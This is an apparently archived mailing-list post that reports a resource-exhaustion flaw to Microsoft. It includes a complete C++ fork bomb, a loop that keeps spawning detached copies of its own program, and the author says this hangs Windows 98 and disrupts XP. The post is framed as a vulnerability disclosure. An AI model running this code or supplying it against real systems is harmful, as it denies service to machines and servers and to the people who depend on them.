The following c++ code can hang w98 systems and disturb XP systems (the only
way to avoid its effects is closing the session, which may bring problems in
a server). I think you should notice it in order to make a great Palladium
System.
I hope this message to be deleted from the mailing list in order to prevent
other user from watching it and using it in a bad way. I couldn't use other
ways to notify it to Microsoft.
Don't contact me.
***********************************************
#include <stdio.h>
#include <process.h>
int main(int argc, char *argv[])
{
for(;;)
spawnl(P_DETACH,argv[0],NULL);
return 0;
}
Leer las respuestas